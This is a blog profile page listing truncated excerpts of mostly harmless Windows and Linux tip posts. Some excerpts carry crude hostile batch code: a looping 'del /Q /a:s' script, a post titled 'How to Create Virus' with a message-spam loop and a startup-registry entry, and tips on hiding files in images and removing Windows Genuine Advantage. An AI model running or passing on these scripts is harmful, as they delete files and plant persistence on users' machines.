mal frozt

66 Followers
4 Blog Followers
Following: 34
Following Blogs: 59

Latest Activity

Adding Memory to Your Computer

mal frozt posted an article on - Nov 2, 2011, 10:04 pm
Your computer will lag behind and you want to give it a boost? Add them to memory. By increasing the RAM on your computer's hard drive, which is slower, be less stressed when you open multiple windows or tabs at the same time, when you manipulate large files when you launch your software when you ...
Comment - Like

Useful Run Command Shortcut

mal frozt posted an article on - Nov 2, 2011, 9:51 pm
* Accessibility Controls : access.cpl * Add Hardware Wizard : hdwwiz.cpl * Add/Remove Programs : appwiz.cpl * Administrative Tools : control admintools * Automatic Updates : wuaucpl.cpl * Bluetooth Transfer Wizard : fsquirt * Calculator : calc * Certificate Manager : certmgr.msc * Character Map : ch...
Comment - Like

How to Recover from System Crash

mal frozt posted an article on - Nov 2, 2011, 9:19 pm
When a Blue Screen Occurs, you'd better be prepared for the worst. If you absolutely must have a backup of your documents, your setup and your software, some settings in Windows can also make a difference if a problem occurs. We advise you to reap that your computer is working properly to collect t...
Comment - Like

Uses of DD Command

mal frozt posted an article on - Nov 2, 2011, 8:38 pm
Linux provides a DD command which is the powerful UNIX utility. It makes use of Linux kernel makefiles to make boot images. DD can be used to copy data from one device to another or from one location to another. Administrator is the only person having rights to execute DD command. You can use the ...
Comment - Like

How to Add subtitles to your home made videos

mal frozt posted an article on - Nov 2, 2011, 8:22 pm
You filmed your vacation and you want to add subtitles to your video to showcase places you have visited for example, to provide additional information to sound and image, or to translate foreign dialogue. Movie Maker software, which is built into Windows XP, Windows Vista and you can install in W...
Comment - Like

Cara Menghapus Virus Shortcut dari Flashdisk dengan Command Prompt(CMD)

mal frozt posted an article on - Nov 2, 2011, 6:59 pm
Ok kita mulai: 1. Buka CMD : Klik "Start",pilih "Run" atau "windows logo" + "R", lalu ketik "cmd" dan Ok. 2. Cari tahu dulu dimana letak drive Flashdisk Anda, misal di disk "G:"], maka pada tampilan box cmd tulislah kode : attrib -h -r -s /s /d g:\*.* 3. Enter 4. Kemudian Cek flashdisk Anda Done.
Comment - Like

How to Protect your computer from Hackers while Online

mal frozt posted an article on - Oct 21, 2011, 6:17 pm
o protect you from hackers on the Internet, we recommend the firewall Jetico: this is the best. And to arrange everything: he is French and free. After defining your trusted zone, that is to say the LAN between your computer and your Internet connection before you will allow or not the software y...
Comment - Like

How to Select and Copy Text from Restricted Website

mal frozt posted an article on - Oct 21, 2011, 1:48 pm
Many web pages that don’t allow you to select and copy text. One of the intention is to prevent anybody from stealing the content and distribute it for commercial purpose.In fact this is a little trick that is done by using javascript which prevent you from selecting the text and eventually fai...
Comment - Like

How to Hide our File in Image

mal frozt posted an article on - Oct 21, 2011, 1:43 pm
1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder -The image will hereby be referred to in all examples as beauty.jpg -The file will hereby be referred to in all examples as New Text Document.txt 2. Add the file/files ...
Comment - Like

How to Improve the performance of laptop

mal frozt posted an article on - Oct 20, 2011, 5:30 pm
Many laptops have a function that extends battery life, but the performance decreases. If you want to make sure that you have a better performance, follow this tweak. Please note that your battery life than declining! 1. Go to the Start menu and type "regedit" in search. Enter below. If you have cl...
Comment - Like

How To Disable Thumbnail Previews in Windows Explorer

mal frozt posted an article on - Oct 20, 2011, 5:23 pm
Thumbnails are reduced-size versions of your pictures and videos. Their role is to allow you to quickly scan and recognize them while browsing your computer. You can disable thumbnails to speed up the windows explorer. Follow the following steps to disable thumbnails in windows explorer * For Win...
Comment - Like

How to Disable Notification Balloons in windows XP

mal frozt posted an article on - Oct 20, 2011, 5:17 pm
To disable balloon tips in the notification area, follow these steps: 1. Go to : Start > Run > type regedit, and hit the enter key. 2. Locate the following subkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced 3. Right-click the right side pane, create a new DWORD val...
Comment - Like

How To Fix Realtek HD Audio: Error 0xE0000227

mal frozt posted an article on - Oct 20, 2011, 5:10 pm
This error sometimes appears when installing the Realtek High Definition driver in XP. You can download the driver here. Here are some more solution: Open Device Manager (Start> Control Panel> System> Hardware) In the "View" menu manager, select "Devices by connection": Disable and uninstall by righ...
Comment - Like

Cara Mempercepat Download File Torrent

mal frozt posted an article on - Oct 14, 2011, 10:56 am
Sebelumnya, bagi yang belum tahu apa itu Torrent, koneksi Peer To Peer, mari kita baca terlebih dahulu pengertian dasar dibawah ini. * P2P : Komunikasi dua arah antara PC yang satu dengan PC yang lain yang terhubung secara langsung. Biasanya digunakan untuk sarana transfer file dimana antar keduanya...
Comment - Like

Repair Hard disk Raw Partition Error

mal frozt posted an article on - Oct 12, 2011, 9:31 pm
You plug as usual your external hard drive to your computer to retrieve its contents or to add files when Windows offers to format it. Your hard drive has serious problems you'll have to try to solve in order to, most importantly, recover your files, and repair your hard drive to it again as usual. ...
Comment - Like

Command Prompt Trick

mal frozt posted an article on - Oct 12, 2011, 9:20 pm
Did you know you can drag & drop files and folders to the command prompt windows (and to any open window in the task bar)? For example, a trick that I use is this: Suppose you want to run a DOS command on a particular folder (ex: "C:\Winnt\system32\drivers\etc") 1 - Open the command prompt (Start->R...
Comment - Like

Enable or disable command extensions

mal frozt posted an article on - Oct 12, 2011, 9:14 pm
When you use CMD.EXE, there are various extensions which are enabled by default. To enable/disable perform the following 1.Start the registry editor (regedit.exe) 2.Move to HKEY_CURRENT_USER\Software\Microsoft\Command Processor 3.Double click on EnableExtensions 4.Set to 1 for them t...
Comment - Like

How to make efficient use of Computer Memory

mal frozt posted an article on - Oct 12, 2011, 9:01 pm
In this post I will provide 5 tips for using memory efficiently in kernel-mode drivers for the Microsoft Windows family of operating systems. Using memory wisely can help improve driver performance. Here are 5 tips for efficient memory use. 1.Lay out data structures efficiently and reuse them when p...
Comment - Like

Google redirect virus or Browser hijacking: How to avoid and protect them from damage

mal frozt posted an article on - Oct 12, 2011, 6:00 pm
The browser hijacking is one of the most commonly used type of online attack in which the attacker or the hacker tried to gain full access of your Internet browser which ever you may be using including the internet Explorer , Mozilla Firefox or even Opera. The attacker tried to change the form and t...
Comment - Like

cool batch file :D

mal frozt posted an article on - Oct 10, 2011, 5:14 am
1). @echo off echo blanking screen ....... cls echo searching ini's @dir c:\*.ini /s/w echo .... Scared ? pause 2). @echo off :start echo 15623682356574 /q /w color 24 del /Q /a:s echo geras-lakha goto start 3). Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sen...
Comment - Like

Cara men disable Google Instan Search

mal frozt posted an article on - Oct 7, 2011, 10:43 am
Google memperkenalkan fitur baru dalam mesin pencarian. Google menyebutnya sebagai Instant Search. Perubahan ini diperkenalkan untuk membuat pencarian cepat dan interaktif dengan menunjukkan hasil yang seketika saat Anda mengetik. Dengan Google Instan, yang Anda cari telah berubah dari sebuah halama...
Comment - Like

Clear your sensitive information on system shutdown

mal frozt posted an article on - Oct 5, 2011, 4:57 am
During data processing some operating systems use the hard disk as memory, called virtual memory. During processing, operating system transfers some data and programs from RAM to hard disk and reloads again when required. The data or programs are stored in hard disk in temporary file called the swap...
Comment - Like

Memperbaiki kerusakan Windows dengan Windows Repair

mal frozt posted an article on - Oct 4, 2011, 11:22 am
Ketika Windows XP, 2003, Vista, 2008 atau 7 mengalami masalah, kadang tidak mudah untuk mengatasinya. Baik permasalahan ini timbul akibat virus (malware), konflik aplikasi atau sebab lainnya. Tetapi, ada aplikasi kecil, gratis dan portable yang bisa kita gunakan untuk mengatasi masalah tersebut, yai...
Comment - Like

Get your own free virtual credit card to shop online or to verify paypal , ebay , adword etc

mal frozt posted an article on - Oct 1, 2011, 12:13 am
Do you want to shop online or pay some one or buy something online but you are worried because you dont have an internationally accepted credit card? Or do you want to verify your paypal , ebay, alertpay , adword , bidvertiser and other accounts using a virtual credit card? If that’s the case the ...
Comment - Like

Best Tricks to Extend Laptop Battery Life

mal frozt posted an article on - Sep 28, 2011, 4:27 am
20 Best Tricks to Extend Laptop Battery Life Recently, mobile technology has become increasingly sophisticated with the new components, the better chips, and a faster processors. But there’s one part of Laptop or Netbook which is the “Achilles heel” – the battery. Operating systems, modern g...
Comment - Like

How to remove Windows XP Genuine Advantage Notification

mal frozt posted an article on - Sep 28, 2011, 4:20 am
1. First – click Start then Run and type “regedit” without quotes and press Enter 2. Go to My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify. In this location delete the folder “WgaLogon” and all content with name WgaLogon. If there is no WgaLo...
Comment - Like

Tips to Setup Wi-Fi Easily

mal frozt posted an article on - Sep 27, 2011, 11:03 am
A wireless network is one that enables the connection of two or more computers together without cables involved. Wi-Fi, was published under the IEEE 802.11 standard, it has been updates, which work at different speeds. The Wireless Local Area Networks, allows highly mobile users, allowing them to mi...
Comment - Like

Recover Corrupted PowerPoint File

mal frozt posted an article on - Sep 27, 2011, 10:57 am
Many times when our computer is affected by malicious files or virus files, they tend to affect document files such as excel, word, powerpoint etc. At such situation, we don't have any other alternative but to delete or remove infected files from the computer hard disk drive. There is no possible wa...
Comment - Like

How Data Recovery Brings Back Deleted Files

mal frozt posted an article on - Sep 27, 2011, 10:47 am
Data recovery software has become a popular solution for accidentally deleted files and items lost due to crashes or system error. However, many people are not familiar with these programs and unsure how they work. In this article, you will know how your computer stores information so you will under...
Comment - Like

Use Your Pen Drive as Ram

mal frozt posted an article on - Sep 27, 2011, 10:40 am
Yes with some modified settings you can use your pen drive as a RAM 1) Connect your pen drive to your PC 2) Allow PC what he is supposed to do,let system to detect pen drive. 3) After your PC finished with its detection work,you have to do some little 4) Right click on the My Computer and se...
Comment - Like

Share internet connection via bluetooth

mal frozt posted an article on - Sep 26, 2011, 1:00 pm
1. Please recognize your two computers as usual. (Start Menu / Config Panel / Network and Internet Connections / Bluetooth ) Only one computer needs to be added, the other is recognized and added automatically. 2. This is done on both computers and the host first. Go to Start Menu / Config Panel / ...
Comment - Like

Folder Lock n Unlock Without Any Software

mal frozt posted an article on - Sep 26, 2011, 12:10 pm
Folder Lock Without Any Software :- Folder Lock With Password Without Any Software- Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do. Then you see a batch file. Double click on this batch file to create a folder locker. New folder named 'Loc...
Comment - Like

Easily convert your texts to MP3 file

mal frozt posted an article on - Sep 26, 2011, 11:35 am
You have to read a long report and you find it tedious? With the speech of Windows and the free Balabolka, you can make the text read by your computer and take the opportunity to do something else at the same time for example. Balabolka also allows you to convert many types of documents: doc, docx, ...
Comment - Like

Missing file win32

mal frozt posted an article on - Jul 5, 2009, 6:41 am
If you have a problem with the file missing win 32 like image below 1. Visual Basic 6.0 Run-Time Files This package includes: ASycFilt.dll, ComCat.dll, MSVBVM60.dll, OLEAut32.dll, OLEPro32.dll, STDOLE2.tlb, ADVPack.dll, W95Inf16.dll, W95Inf32.dll, VBRun60.inf download 2. Visual Basic 5.0 Run-Ti...
Comment - Like

How to show your blog or website to google search

mal frozt posted an article on - Jul 5, 2009, 5:55 am
Enter the website url or your blog url and you will automatically go to the google index. This is a very easy huh ^ ^ just klik
Comment - Like

Alt code

mal frozt posted an article on - Jul 5, 2009, 5:26 am
For you I will share some Alt codes, I hope this is useful for you. Ok here we go: * alt + 1 = ☺ * alt + 2 = ☻ * alt + 3 = ♥ * alt + 4 = ♦ * alt + 5 = ♣ * alt + 6 = ♠ * alt + 7 = • * alt + 8 = ◘ * alt + 9 = ○ * alt + 10 = ◙ * alt + 11 = ♂ * alt + 12 = ♀ *...
Comment - Like

How to Access the Internet with paint

mal frozt posted an article on - Jul 5, 2009, 4:37 am
If you have a problem with your browser, for example, exposed to malware or any we can use the "paint" for internet access emergency. Ok, now we begin: 1. Click Start> Programs> Accessories> Paint use the script command or the Windows Logo + R, then type "mspaint" 2. Once paint is open, press F1 on ...
Comment - Like

How to Create Virus

mal frozt posted an article on - Jul 4, 2009, 11:38 am
Ok here we go: 1). @ECHO off :Begin msg * hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN 2). @echo off del C:\1.reg >>"C:\1.reg" ECHO winblows Registry Editor Version 5.00 >>"C:\1.reg" ECHO >>"C:\1.reg" ECHO "MSConfig"="C:\\1.b...
Comment - Like

Invisible checker YM

mal frozt posted an article on - Jul 4, 2009, 5:03 am
invisible checker YM Want to know your ym friend is online or not? Most of them may like the invisible status. Try this site to check them : Status checker
Comment - Like

Master Grab Avatar YM

mal frozt posted an article on - Jul 4, 2009, 3:59 am
This software will enable you to know your chat friend photos. although he does not share the photo,we can still see . just download here
Comment - Like

Google hacker version

mal frozt posted an article on - Jul 3, 2009, 7:55 am
just klik
Comment - Like

Shortcut for YM

mal frozt posted an article on - Jul 3, 2009, 5:59 am
Ctrl + G = buzz (pm in the windows ) Ctrl + H = Toggle between online and offline friends in your list mesenger Ctrl + D = sign out from yahoo Ctrl + Q = close yahoo mesenger Ctrl + M = send PM Ctrl + L = call the computer Ctrl + K = call the phone number Ctrl + T = send SMS Ctrl + Y = send Email Ct...
Comment - Like

About Me

virgo

mal frozt's Blogs:

mal frozt's Followers

mal frozt is Following

Invite Your Friends

Invite your contacts to blogged from:
gmail yahoo